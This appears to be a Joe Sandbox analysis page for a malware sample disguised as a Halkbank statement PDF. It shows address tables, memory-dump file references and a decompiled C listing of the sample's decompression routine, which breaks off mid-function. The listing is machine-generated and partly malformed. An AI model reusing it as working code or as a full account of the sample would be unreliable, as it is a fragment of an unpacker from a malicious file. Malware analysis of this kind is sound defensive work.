                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x00407068
                                                      0x0040706c
                                                      0x0040708f
                                                      0x00407092
                                                      0x00407095
                                                      0x0040709f
                                                      0x0040706e
                                                      0x0040706e
                                                      0x00407071
                                                      0x00407074
                                                      0x00407077
                                                      0x00407084
                                                      0x00407087
                                                      0x00407087
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x004070ab
                                                      0x004070af
                                                      0x00000000
                                                      0x00000000
                                                      0x004070b5
                                                      0x004070b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004070bf
                                                      0x004070c1
                                                      0x004070c5
                                                      0x004070c5
                                                      0x004070c8
                                                      0x004070cc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407143
                                                      0x00407147
                                                      0x0040714e
                                                      0x00407151
                                                      0x00407154
                                                      0x00407149
                                                      0x00407149
                                                      0x00407149
                                                      0x00407157
                                                      0x0040715a
                                                      0x00000000
                                                      0x00000000
                                                      0x00407203
                                                      0x00407203
                                                      0x00407207
                                                      0x004075a5
                                                      0x00000000
                                                      0x004075a5
                                                      0x0040720d
                                                      0x00407210
                                                      0x00407213
                                                      0x00407217
                                                      0x0040721a
                                                      0x00407220
                                                      0x00407222
                                                      0x00407222
                                                      0x00407222
                                                      0x00407225
                                                      0x00407228
                                                      0x00000000
                                                      0x00000000
                                                      0x00406df8
                                                      0x00406df8
                                                      0x00406dfc
                                                      0x00407569
                                                      0x00000000
                                                      0x00407569
                                                      0x00406e02
                                                      0x00406e05
                                                      0x00406e08
                                                      0x00406e0c
                                                      0x00406e0f
                                                      0x00406e15
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e1a
                                                      0x00406e1d
                                                      0x00406e1d
                                                      0x00406e20
                                                      0x00406e23
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e29
                                                      0x00406e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e35
                                                      0x00406e35
                                                      0x00406e39
                                                      0x00406e3c
                                                      0x00406e3f
                                                      0x00406e42
                                                      0x00406e45
                                                      0x00406e46
                                                      0x00406e49
                                                      0x00406e4b
                                                      0x00406e51
                                                      0x00406e54
                                                      0x00406e57
                                                      0x00406e5a
                                                      0x00406e5d
                                                      0x00406e60
                                                      0x00406e63
                                                      0x00406e7f
                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00000000
                                                      0x00407489
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407546
                                                      0x00407447
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c7
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x0040744d
                                                      0x00407447
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074eb
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x0040751d
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000
                                                      0x004075fa
                                                      0x00407447
                                                      0x004073ce
                                                      0x004073cb
                                                      0x00000000
                                                      0x00407120

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                      • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                      • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                      • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
